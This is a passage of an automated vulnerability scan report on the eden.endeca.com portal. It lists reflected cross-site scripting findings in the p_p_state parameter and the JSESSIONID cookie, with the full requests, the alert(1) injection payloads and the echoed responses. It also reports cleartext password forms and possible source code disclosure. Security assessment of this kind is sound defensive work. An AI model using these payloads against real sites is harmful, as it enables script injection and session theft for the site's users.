GET /web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view70829<script>alert(1)</script>6bee4a3da18870390 &p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update&_58_rememberMe=false&_58_login=xss&_58_password=xs HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.4.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 500 Internal Server Error-5.5...[SNIP]... 70829<script>alert(1)</script>6bee4a3da18870390 <br />...[SNIP]...
2.8. http://eden.endeca.com/web/guest/home [p_p_state parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The value of the p_p_state request parameter is copied into the HTML document as plain text between tags. The payload dfa66<script>alert(1)</script>ebabc20a068 was submitted in the p_p_state parameter. This input was echoed unmodified in the application's response.
Request
GET /web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normaldfa66<script>alert(1)</script>ebabc20a068 &p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update HTTP/1.1/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.4.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 500 Internal Server Error-5.5...[SNIP]... dfa66<script>alert(1)</script>ebabc20a068 <br />...[SNIP]...
2.9. http://eden.endeca.com/web/guest/home [p_p_state parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The value of the p_p_state request parameter is copied into the HTML document as plain text between tags. The payload ce32a<script>alert(1)</script>54dc7a23760948b4c was submitted in the p_p_state parameter. This input was echoed unmodified in the application's response.
Request
GET /web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normalce32a<script>alert(1)</script>54dc7a23760948b4c &p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update&_58_rememberMe=false&_58_login=xss&_58_password=xs HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.4.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 500 Internal Server Error-5.5...[SNIP]... ce32a<script>alert(1)</script>54dc7a23760948b4c <br />...[SNIP]...
2.10. http://eden.endeca.com/ [JSESSIONID cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/
Issue detail
The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0100"-alert(1)-"7797e091306 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0d0100"-alert(1)-"7797e091306 ; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response (redirected)
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... _comp1";},getURLHome: function() {return "http://eden.endeca.com";},getSessionId: function() {return "34FA36D7DD85A962950BF6A9EBC9C0E0d0100"-alert(1)-"7797e091306 ";}};var mainPath = themeDisplay.getPathMain();</script>...[SNIP]...
2.11. http://eden.endeca.com/c/portal/login [JSESSIONID cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/c/portal/login
Issue detail
The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aafbf"-alert(1)-"489b9bb4570 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/portal/login?tabs1=forgot-password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0aafbf"-alert(1)-"489b9bb4570 ; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5D85A962950BF6A9EBC9C0E0aafbf"-alert(1)-"489b9bb4570; Path=//xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... _comp1";},getURLHome: function() {return "http://eden.endeca.com";},getSessionId: function() {return "34FA36D7DD85A962950BF6A9EBC9C0E0aafbf"-alert(1)-"489b9bb4570 ";}};var mainPath = themeDisplay.getPathMain();</script>...[SNIP]...
2.12. http://eden.endeca.com/web/eden/home [JSESSIONID cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/eden/home
Issue detail
The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f82ff"-alert(1)-"605cd1b2c48 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/eden/home HTTP/1.1/web/eden/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0f82ff"-alert(1)-"605cd1b2c48 ; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.8.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response (redirected)
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... _comp1";},getURLHome: function() {return "http://eden.endeca.com";},getSessionId: function() {return "34FA36D7DD85A962950BF6A9EBC9C0E0f82ff"-alert(1)-"605cd1b2c48 ";}};var mainPath = themeDisplay.getPathMain();</script>...[SNIP]...
2.13. http://eden.endeca.com/web/guest/home [JSESSIONID cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 677e9"-alert(1)-"381192664ef was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /web/guest/home HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=677e9"-alert(1)-"381192664ef ; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5)-"381192664ef; Path=//xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... /images";},getPathThemeRoot: function() {return "/html/themes/endeca_comp1";},getURLHome: function() {return "http://eden.endeca.com";},getSessionId: function() {return "677e9"-alert(1)-"381192664ef ";}};var mainPath = themeDisplay.getPathMain();</script>...[SNIP]...
3. Cleartext submission of password
previous
next
There are 2 instances of this issue:
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
3.1. http://eden.endeca.com/c/portal/login
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/c/portal/login
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://eden.endeca.com/c/portal/login
Request
GET /c/portal/login?tabs1=forgot-password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... -registeredTabsSection" style="display: none;"><form action="/c/portal/login" method="post" name="fm1"> ">...[SNIP]... <input class="form-text" name="password" style="width: 150px" type="password" value=""> ...[SNIP]...
3.2. http://eden.endeca.com/c/portal/render_portlet
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://eden.endeca.com/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update
Request
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... <form action="http://eden.endeca.com/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update" method="post" name="_58_fm"> <input name="_58_rememberMe" type="hidden" value="false">...[SNIP]... <input class="form-text" name="_58_password" style="width: 120px;" type="password" value=""> </td>...[SNIP]...
4. Password field with autocomplete enabled
previous
next
There are 2 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
4.1. http://eden.endeca.com/c/portal/login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/c/portal/login
Issue detail
The page contains a form with the following action URL:http://eden.endeca.com/c/portal/login
Request
GET /c/portal/login?tabs1=forgot-password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... -registeredTabsSection" style="display: none;"><form action="/c/portal/login" method="post" name="fm1"> ">...[SNIP]... <input class="form-text" name="password" style="width: 150px" type="password" value=""> ...[SNIP]...
4.2. http://eden.endeca.com/c/portal/render_portlet
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The page contains a form with the following action URL:http://eden.endeca.com/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update
Request
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response
HTTP/1.1 200 OK-5.5>" id="po...[SNIP]... <form action="http://eden.endeca.com/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update" method="post" name="_58_fm"> <input name="_58_rememberMe" type="hidden" value="false">...[SNIP]... <input class="form-text" name="_58_password" style="width: 120px;" type="password" value=""> </td>...[SNIP]...
5. Source code disclosure
previous
next
There are 5 instances of this issue:
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
5.1. http://eden.endeca.com/c/portal/login
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/login
Issue detail
The application appears to disclose some server-side source code written in JSP and ASP.
Request
GET /c/portal/login?tabs1=forgot-password HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/web/guest/home?p_p_id=58&p_p_action=1&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_count=2&_58_struts_action=%2Flogin%2Fview&_58_cmd=update;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.6.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... <%@ include file="init.jsp" %> ...[SNIP]... <%= selectable %> "><liferay-util:include page="<%= Constants.TEXT_HTML_DIR + tilesContent %> " /></c:when><c:otherwise><%portletDisplay.recycle();portletDisplay.setTitle(title);%> <liferay-theme:box top="portlet_top.jsp" bottom="portlet_bottom.jsp">...[SNIP]... <%= Constants.TEXT_HTML_DIR + tilesContent %> " />...[SNIP]...
5.2. http://eden.endeca.com/c/portal/render_portlet
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/c/portal/render_portlet
Issue detail
The application appears to disclose some server-side source code written in JSP.
Request
POST /c/portal/render_portlet HTTP/1.1-urlencoded/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com_p_action=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=0&p_p_col_count=2¤tURL=%2Fweb%2Fguest%2Fhome
Response
HTTP/1.1 200 OK-5.5<%@ include file="init.jsp" %> >" id="po...[SNIP]...
5.3. http://eden.endeca.com/html/themes/endeca_comp1/css/css_cleaned.css
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/html/themes/endeca_comp1/css/css_cleaned.css
Issue detail
The application appears to disclose some server-side source code written in ASP.
Request
GET /html/themes/endeca_comp1/css/css_cleaned.css HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5...[SNIP]... <%= BrowserSniffer.is_ie(request) %> ">...[SNIP]... <%= BrowserSniffer.is_ie(request) %> ">...[SNIP]... <%= BrowserSniffer.is_ie(request) %> ">...[SNIP]...
5.4. http://eden.endeca.com/web/eden/home
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/web/eden/home
Issue detail
The application appears to disclose some server-side source code written in ASP.
Request
GET /web/eden/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/portal/login?tabs1=forgot-password;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.8.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - User Profile</title><meta http-eq...[SNIP]... <%= selectable %> "><liferay-util:include page="<%= Constants.TEXT_HTML_DIR + tilesContent %> " /></c:when><c:otherwise><%portletDisplay.recycle();portletDisplay.setTitle(title);%> <liferay-theme:box top="portlet_top.jsp" bottom="portlet_bottom.jsp">...[SNIP]... <%= Constants.TEXT_HTML_DIR + tilesContent %> " />...[SNIP]...
5.5. http://eden.endeca.com/web/guest/home
previous
next
Summary
Severity:
Low
Confidence:
Tentative
Host:
http://eden.endeca.com
Path:
/web/guest/home
Issue detail
The application appears to disclose some server-side source code written in JSP and ASP.
Request
GET /web/guest/home HTTP/1.1/web/guest/home;q=0.3-172190625-40ff-48ce-b490-d7a2ce3df80c; __ALC_STID=6443%7C172190625-40ff-48ce-b490-d7a2ce3df80c; session_start_time=1319113070998; k_visit=1; push_time_start=1319113091000; __utma=55694975.2114550312.1319113064.1319113064.1319113064.1; __utmb=55694975.6.10.1319113064; __utmc=55694975; __utmz=55694975.1319113064.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=34FA36D7DD85A962950BF6A9EBC9C0E0; GUEST_LANGUAGE_ID=en_US; __utma=102195797.1134885396.1319113154.1319113154.1319113154.1; __utmb=102195797.2.10.1319113154; __utmc=102195797; __utmz=102195797.1319113154.1.1.utmcsr=endeca.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/about-us/company-overview.html; __utmv=102195797.default%40endeca.com; COOKIE_SUPPORT=true
Response
HTTP/1.1 200 OK-5.5/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr"><head><title>endeca.com - Welcome</title><script type='text...[SNIP]... <%@ include file="init.jsp" %> ...[SNIP]... <%= selectable %> "><liferay-util:include page="<%= Constants.TEXT_HTML_DIR + tilesContent %> " /></c:when><c:otherwise><%portletDisplay.recycle();portletDisplay.setTitle(title);%> <liferay-theme:box top="portlet_top.jsp" bottom="portlet_bottom.jsp">...[SNIP]... <%= Constants.TEXT_HTML_DIR + tilesContent %> " />...[SNIP]...
6. Referer-dependent response
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://eden.endeca.com
Path:
/web/eden/home
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function. Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques. Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the 